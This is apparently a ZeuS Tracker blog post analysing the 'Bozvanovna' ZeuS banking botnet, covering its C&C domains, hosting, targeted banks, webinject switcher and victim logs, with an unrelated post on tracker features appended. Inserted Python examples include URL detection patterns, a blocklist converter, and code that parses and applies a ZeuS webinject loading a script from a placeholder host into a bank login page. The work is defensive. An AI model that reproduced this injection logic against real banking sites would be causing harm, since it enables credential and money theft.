
The Bozvanovna ZeuS Botnet

This week I’ve taken the opportunity to take a closer look at the current ZeuS campaigns. A few of them keep popping up again and again, so I’ve tried to get some more information about those botnets, their targets as well as the infrastructure that the cybercriminals are using.

In this first blog post I will talk about a ZeuS botnet which I call the “Bozvanovna Botnet”, which is being spread using drive-by exploits (hopefully I will find the time to blog about the other botnets that I’ve found too…).

First of all, let’s take a look at the botnet Command&Control infrastructure: The cybercriminals have registered a large number of domains to serve ZeuS configs and binaries as well as to provide a dropzone to which the infected clients (bots) upload the stolen information. The reason for this is pretty simple: In most cases the domains that get listed on ZeuS Tracker get nuked quickly, so the cybercriminals have to register new domains every time the old ones get suspended.

Below is a list of the domains that were associated with the Bozvanovna Botnet and that ZeuS Tracker came across:

Firstseen Domain Registrar Registrant A record Status
2010-10-18 DIRECTI Anton Petushkov Suspended
2010-10-30 REGTIME Andrey Aleksandrovich Polev Suspended
2010-10-29 REGTIME Andrey Aleksandrovich Polev Suspended
2010-11-05 REGTIME Anton Petushkov Suspended
2010-11-07 REGTIME SP3 LTD Suspended
2010-11-22 DIRECTI Annamos Susdanil Suspended
2010-11-22 DIRECTI Petr Klimov Suspended
2010-11-25 DIRECTI SP3 LTD Suspended
2010-11-28 DIRECTI SP3 LTD Suspended
2010-11-28 DIRECTI Saoma LTD Suspended
2010-11-28 DIRECTI Saoma LTD Suspended
2010-11-16 REGTIME Maksim A Roslyakov Inactive
2010-11-22 REGTIME Maksim A Roslyakov Suspended
2010-11-22 REGTIME Maksim A Roslyakov Suspended
2010-11-27 DIRECTI Saoma ltd Suspended
2010-11-28 DIRECTI SP3 LTD Suspended
2010-12-05 REGTIME Maksim A Roslyakov Suspended
2010-12-06 REGTIME Max Pet Inactive
2010-12-08 REGTIME Evgeniy Jaakson Active
2010-12-08 REGTIME Evgeniy Jaakson Active
2010-12-10 DIRECTI Suspended
2010-12-10 DIRECTI Suspended
2010-12-13 DIRECTI Alexander Fulop Suspended
2010-12-13 DIRECTI Alexander Fulop Suspended
2010-12-13 DIRECTI Alexander Fulop Suspended
2010-12-13 DIRECTI Alexander Fulop Suspended
2010-12-13 DIRECTI Alexander Fulop Suspended
2010-12-13 DIRECTI Alexander Fulop Suspended
2010-12-13 REGTIME Aaltonen Alexander Active
2010-12-13 REGTIME Aaltonen Alexander Active
2010-12-13 DIRECTI Suspended
2010-12-14 DIRECTI Alexander Fulop Suspended
2010-12-16 DIRECTI Alexander Fulop Suspended
2010-12-16 REGTIME Evgeniy Jaakson Active
2010-12-17 REGTIME Aaltonen Alexander Active
2010-12-17 REGTIME Aaltonen Alexander Active
2010-12-17 REGTIME Evgeniy Jaakson Active
2010-12-19 DIRECTI Suspended

The first domain popped up on 2010-10-18, but it looks like the Bozvanovna gang has been operating at least since July 2010. Fortunately, it’s pretty easy to spot the domains that belong to this specific botnet, because in most cases they use the same URL scheme:

  • ZeuS Config file:
  • ZeuS Binary file: 000XYYY.exe
  • ZeuS Dropzone: i.php

Where X is an alphabetic letter (eg n or x) and Y a numeric character (eg 2 or 123).
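The URL scheme above is the kind of thing you can pivot on in proxy logs. The following is an added example (it is not part of the original post and not ZeuS Tracker code): it matches the binary name pattern 000XYYY.exe (one letter followed by one or more digits, as described above) and the i.php dropzone script, and runs the check over a few constructed Squid-style access-log lines. The config-file path is not shown in the post, so it is not matched here; the hostnames and IP addresses in the sample log are made up.

```python
import re
from urllib.parse import urlsplit

# Patterns taken from the post: binary "000" + one letter + digits + ".exe",
# dropzone "i.php".  Matching is done on the last path component only.
BINARY_RE = re.compile(r"^000[a-z]\d+\.exe$", re.IGNORECASE)
DROPZONE_RE = re.compile(r"^i\.php$", re.IGNORECASE)


def classify_url(url: str):
    """Return 'binary', 'dropzone' or None for a single URL."""
    name = urlsplit(url).path.rsplit("/", 1)[-1]
    if BINARY_RE.match(name):
        return "binary"
    if DROPZONE_RE.match(name):
        return "dropzone"
    return None


# Constructed Squid access.log lines (native format); hosts and IPs are made up.
SAMPLE_LOG = """\
1292000001.123    120 10.0.0.5 TCP_MISS/200 51234 GET http://example-cnc.test/000n2.exe - DIRECT/198.51.100.7 application/octet-stream
1292000002.456     80 10.0.0.5 TCP_MISS/200 12 POST http://example-cnc.test/i.php - DIRECT/198.51.100.7 text/html
1292000003.789     60 10.0.0.9 TCP_HIT/200 8000 GET http://www.example.org/index.php - NONE/- text/html
1292000004.000     70 10.0.0.9 TCP_MISS/200 300 GET http://cdn.example.org/000xabc.exe - DIRECT/203.0.113.9 application/octet-stream
"""


def scan_log(text: str):
    """Return (client_ip, url, kind) for every log line whose URL matches a pattern."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7:          # not a native-format Squid line
            continue
        client_ip, url = fields[2], fields[6]
        kind = classify_url(url)
        if kind:
            hits.append((client_ip, url, kind))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(*hit)
```

A filename pattern this short will also match benign traffic on a large network, so treat a hit as a pivot (check the host against ZeuS Tracker, look at what the same client did before and after) rather than as a verdict on its own.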

Another point which pops up when we take a look at the list above is that most of the domains are hosted at a well known bulletproof hosting provider named VolgaHost, which is located in Russia:

As number: AS29106
AS name: VolgaHost
ZeuS C&Cs:
Spamhaus SBL:
CIDR Report:

According to CIDR Report, VolgaHost is being routed through AS39307 – DCOMM-UA-AS Digital Communications Ltd. Both ASes can be considered 100% malicious and should therefore not be routed. But let’s get back to the Bozvanovna botnet…

When I took a look at the ZeuS config files of the Bozvanovna botnet (they are using ZeuS version, I was really surprised to see how many financial institutions they are targeting. Below is a list of the targets of this ZeuS campaign which I’ve seen so far:

  • NatWest
  • HSBC
  • Nationwide
  • Lloyds TSB
  • Co-operative bank
  • Bank of Scotland
  • Yorkshire Bank
  • Halifax
  • Postbank
  • Sparkasse
  • Barclays
  • Commerzbank

Like most ZeuS campaigns, the Bozvanovna botnet is also using so-called Webinjects to phish credentials and steal money from the victim’s online bank account. The Bozvanovna botnet is using different Webinjects: some of them are implemented in the ZeuS config file and some of them are hosted on a server on the internet (to generate webinjects dynamically). In total I’ve seen two domains which are being used to serve the webinjects:

Domain Registrar Registrant A record AS number AS name
REGTIME Lubov Bozvanovna AS23352 Server Central Network
REGTIME Aaltonen Alexander AS55720 GIGABIT-MY

Both domain names are currently active and what is even more interesting: Both domain names are using HTTPS with a valid certificate. This is actually not that uncommon: A lot of the recent ZeuS campaigns I’ve seen are using valid SSL certificates to avoid browser warnings on the client side during the ebanking session.

Bozvanovna SSL certificate

The webinjects as well as the server side scripts are (as in most cases) pretty complex. What I’ve seen in the Bozvanovna ZeuS campaign is that they can switch the targets of their interest pretty easily by using some kind of switcher to turn the campaign against a particular bank on or off. Therefore they have defined webinjects in the ZeuS config file for a lot of different financial institutions. As soon as they want to activate a campaign, they just have to set the switcher on the webinject server to on (by using this switcher they don’t have to change the config file every time they want to change the targets of their campaign). Let’s take a look at a target in the ZeuS config file of Bozvanovna:

Webinject Bozvanovna

The Target URL defines the target of this Webinject. The cybercriminal can then define at which point of the online banking site they want to replace or insert code (data_before / data_after). In this example ZeuS will add a lot of HTML and JavaScript code (data_inject) after the head tag. What is interesting in this example is that the victim’s browser will load additional code from using JavaScript. As already mentioned before, you can see that they are using HTTPS to load that code from

If we take a look at this URL referenced in the ZeuS config file, we will see the following content:

var current_state = "offline";

It looks like the cybercriminals have disabled the phishing campaign against this target, but they can change that pretty easily:

Bozvanovna Webinject Status

If we now take another look at the same URL again, we will see that there is now a lot of HTML code being served from and injected into the online banking session of the victim:

Activated Webinject

What we see in the code snippet above is that the phishing campaign against this target is now active. ZeuS will now phish the credentials for the online bank account and display the error message “We have problem with online service. Try again later, sorry for any inconvenience” to the victim.
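To make the mechanics concrete, here is an added example (not code from the original post and not part of ZeuS) that reads a target entry in the ZeuS webinject syntax described above (set_url, then data_before / data_inject / data_after blocks closed by data_end), applies it to a page the way the bot does in the browser, and classifies what the remote “switcher” URL returns. The bank URL, the script host and the page HTML are made up; the assumption that an active response carries no current_state flag is mine.

```python
import re

# Constructed entry in ZeuS webinject syntax: inject a script tag right after
# the <head> tag of the login page.  data_after is left empty on purpose.
SAMPLE_WEBINJECTS = """\
set_url https://bank.example/login* GP
data_before
<head>
data_end
data_inject
<script type="text/javascript" src="https://inject.example/state.js"></script>
data_end
data_after
data_end
"""


def parse_webinjects(text):
    """Parse webinject text into a list of dicts (url, flags, three data blocks)."""
    entries, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("set_url "):
            parts = line.split()
            current = {"url": parts[1], "flags": parts[2] if len(parts) > 2 else "",
                       "data_before": "", "data_inject": "", "data_after": ""}
            entries.append(current)
            section = None
        elif line in ("data_before", "data_inject", "data_after"):
            section = line
        elif line == "data_end":
            section = None
        elif section is not None and current is not None:
            current[section] += raw + "\n"
    return entries


def url_matches(pattern, url):
    """set_url patterns use '*' as a wildcard (a simplification of ZeuS matching)."""
    regex = "^" + re.escape(pattern).replace(r"\*", ".*") + "$"
    return re.match(regex, url) is not None


def apply_webinject(entry, html):
    """Return the page as the victim's browser sees it after the inject.

    The bot places data_inject between the first occurrence of data_before and
    the next occurrence of data_after, replacing whatever sits between them.
    With an empty data_after the inject simply follows data_before.
    """
    before, after = entry["data_before"].strip(), entry["data_after"].strip()
    start = html.find(before) if before else 0
    if start < 0:
        return html                       # anchor absent: page left untouched
    insert_at = start + len(before)
    if after:
        end = html.find(after, insert_at)
        if end < 0:
            return html
        return html[:insert_at] + entry["data_inject"] + html[end:]
    return html[:insert_at] + entry["data_inject"] + html[insert_at:]


STATE_RE = re.compile(r'var\s+current_state\s*=\s*"(\w+)"')


def campaign_state(js_text):
    """Classify the body served by the remote switcher URL.

    The post shows the URL returning only 'var current_state = "offline";'
    while a target is switched off and a full block of HTML/JavaScript once it
    is on.  Assumption: an active response carries no current_state flag.
    """
    m = STATE_RE.search(js_text)
    if m:
        return m.group(1)
    return "online" if js_text.strip() else "unknown"


if __name__ == "__main__":
    entry = parse_webinjects(SAMPLE_WEBINJECTS)[0]
    page = "<html><head><title>Bank</title></head><body></body></html>"
    print(apply_webinject(entry, page))
    print(campaign_state('var current_state = "offline";'))
```

For an analyst, the last function is the useful one: polling the switcher URL from a lab machine and logging the state over time reveals exactly the on/off windows the post describes, without needing a live infection.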

We have seen that the webinjects are pretty complex. So we have to ask ourselves: Is this really going to work? I can tell you: yes it is! Below is a screenshot of a log which is generated by the webinject backend:

Bozvanovna Victims


The log file is huge and contains information about:

  • Timestamp
  • Victims IP address
  • Victims Bank
  • User Agent (Browser)
  • Customer Number (Account number)
  • Memorable Data
  • Passnumber
  • Available amount of cash

You can also see that some of the victims are using Firefox, so you can be targeted by such phishing attacks even when you use Firefox for your online banking sessions. Another interesting point in the log files are the timestamps: They attacked the Nationet Internet Banking from October 14th to October 21st. Afterwards it seems that they stopped the phishing campaign against this bank for some time by turning off the switcher (which I talked about before). Since December 17th they have been targeting the bank again.

But there is one fact that scares me much more than anything else: I saw a couple of victims who logged in to online banking accounts tagged as Business or Corporate online. When I did a whois on the victims’ IPs I saw that these IPs belong to corporate customers within Europe. This means that the cybercriminals are also targeting business customers and therefore have access to a lot of money (you can imagine that there is more money on a business bank account than on the bank account of a private customer).

If we look at the admin panel of the server which is hosting the webinjects, we see that the cybercriminals have already grabbed a lot of information about the bank accounts of their victims. Below is just a very small screenshot of the admin panel (called personal room) on

Bozvanovna Admin Panel

The bank account which I’ve outlined in the screenshot above currently has a balance of 371’535.26 pounds. And now imagine: The entry table has 600 bank accounts listed! So there is a lot of money on those accounts….

Finally, let’s take a short look at the Bozvanovna botnet itself. Fortunately I had the chance to sinkhole a handful of domains which are associated with the Bozvanovna botnet and which are being used to control it. Therefore I’m able to provide some information about the Bozvanovna botnet’s geolocation:

Bozvanovna Botnet Geolocation

As shown in the pie chart above, most infected clients are located in Great Britain (GB) and Germany (DE). That’s not really surprising, because the financial institutions targeted by the Bozvanovna ZeuS campaign are mainly located in those countries.

*** Conclusion ***
While ZeuS and SpyEye obviously merged some months ago, we can see that ZeuS is still around (at least for now). The Bozvanovna ZeuS campaign is a good example of how sophisticated and complex the attacks on financial institutions are today.

If you want to mitigate the ZeuS threat in your network, I recommend you use one of ZeuS Tracker blocklists:
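Blocklists like these are only useful once they are turned into something a proxy, a firewall or a host can enforce. The following is an added example (not part of the post and not ZeuS Tracker’s own tooling) that reads a domain list and an IP list in the one-entry-per-line, ‘#’-comment style of such feeds, validates and de-duplicates the entries (a downloaded blocklist is untrusted input and should never be pasted straight into a firewall command), and emits hosts-file, Squid and iptables forms. Both sample lists are constructed and every entry in them is made up.

```python
import ipaddress
import re

# Constructed sample lists in blocklist style; entries are made up.
SAMPLE_DOMAINS = """\
# ZeuS domain blocklist (constructed sample)
example-cnc.test
Inject.Example   # mixed case gets normalised
example-cnc.test
not a domain!
"""
SAMPLE_IPS = """\
# ZeuS IP blocklist (constructed sample)
198.51.100.7
203.0.113.9
999.1.1.1
"""

# RFC 1123 hostname: dot-separated labels, letters/digits/hyphens, 253 chars max.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z][a-z0-9-]{1,62}$")


def is_hostname(s):
    return HOSTNAME_RE.match(s) is not None


def is_ipv4(s):
    try:
        ipaddress.IPv4Address(s)
        return True
    except ValueError:
        return False


def parse_list(text, valid):
    """Return the valid, lower-cased, de-duplicated entries of a blocklist, in order."""
    seen, out = set(), []
    for raw in text.splitlines():
        item = raw.split("#", 1)[0].strip().lower()   # drop comments and padding
        if item and item not in seen and valid(item):
            seen.add(item)
            out.append(item)
    return out


def to_hosts_file(domains, sink="127.0.0.1"):
    """hosts-file lines (Windows or Unix): each C&C name resolves to the sink address."""
    return "".join(f"{sink} {d}\n" for d in domains)


def to_squid_acl(domains):
    """Squid dstdomain file; the leading dot also matches subdomains.
    squid.conf:  acl zeus dstdomain "/etc/squid/zeus.txt"   then   http_access deny zeus
    """
    return "".join(f".{d}\n" for d in domains)


def to_iptables(ips, chain="ZEUS"):
    """Shell lines that build a chain dropping traffic to and from each C&C IP."""
    rules = [f"iptables -N {chain}"]
    for ip in ips:
        rules.append(f"iptables -A {chain} -d {ip} -j DROP")
        rules.append(f"iptables -A {chain} -s {ip} -j DROP")
    rules.append(f"iptables -I FORWARD -j {chain}")
    rules.append(f"iptables -I OUTPUT -j {chain}")
    return rules


if __name__ == "__main__":
    domains = parse_list(SAMPLE_DOMAINS, is_hostname)
    ips = parse_list(SAMPLE_IPS, is_ipv4)
    print(to_hosts_file(domains), to_squid_acl(domains), "\n".join(to_iptables(ips)), sep="\n")
```

Two caveats a practitioner will want: a hosts-file entry only affects name resolution on that one machine, so it is a last line of defence, not a network control; and since C&C domains are nuked and re-registered quickly (as the post shows), the generated files must be refreshed from the feed on a schedule, not installed once.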


ZeuS Tracker Online Again With New Features

As most of you probably noticed, ZeuS Tracker was offline for a whole week (2010-09-03 to 2010-09-14). During this time I made several improvements and added new features to ZeuS Tracker.

But before I go on with the list of new features, I would like to point your attention to another topic:

I’m currently working on a new project which should help operators of large networks (like ISPs, governmental organizations and NGOs) to mitigate bad traffic in their network. The project is currently in BETA and I’m searching for administrators who are able to test the functions of the new project in a test network environment. Unfortunately I’m currently not able to disclose more information about the new project. If you are the network operator of a large network and are willing to help, please contact me using the contact form.

Back to the main topic: Below is a list of new features on ZeuS Tracker.

New features

  • ZT now records how long a ZeuS host is up (uptime)
  • ZeuS Tracker now tracks FakeURLs used by the ZeuS Crimeware
  • The monitor page now displays the HTTP status code returned by the ZeuS URLs (200, 404 etc)
  • If available, the monitor page displays the hostname for a ZeuS host
  • Added Virustotal support for ZeuS binaries
  • ZT now provides the Builder versions with which the ZeuS config files have been created
  • Added Google Maps to the ZT IP page
  • Added IP- and domain blocklist for Squid, iptables and Windows Host file


  • ZeuS Tracker cron script has been fully rewritten
  • The cron script now runs in threaded mode (faster in checking ZeuS hosts)
  • Statistic page now displays some additional statistics (Spamhaus SBL stats, Builder versions etc).

Additionally, I’ve made a huge ZeuS Tracker database cleanup and removed old and non-resolving hosts.

Automated binary submissions to the AV industry

ZeuS Tracker now supports the AV industry by submitting new ZeuS binaries to the AV vendors as soon as they appear on the ZeuS Tracker. I’ve made special agreements with some of the AV vendors listed below which give the ZeuS Tracker direct access to their sandbox systems. Some of the AV vendors are doing a great job, which makes it possible for a new signature to be released just a few minutes after ZT submitted the binary to the sandbox (using reputation based detection systems).

Currently, the following AV vendors receive a real time binary feed from ZeuS Tracker:

  • Avast
  • AVG
  • Avira
  • CA
  • Comodo
  • BitDefender
  • Emsisoft
  • Eset
  • eSafe
  • Finjan
  • Fortinet
  • G-Data
  • Ikarus
  • Kaspersky
  • Prevx
  • Sunbelt
  • F-Secure
  • McAfee
  • Norman
  • Panda
  • Rising
  • Sophos
  • Spybot
  • Symantec
  • Trend Micro

I hope you enjoy the new features of ZeuS Tracker!

PS: I’m currently searching for a sponsor for an SSL certificate for the ZeuS Tracker. If you are able to provide an SSL certificate to ZeuS Tracker I would love it if you contacted me using the contact form. Any help would be appreciated!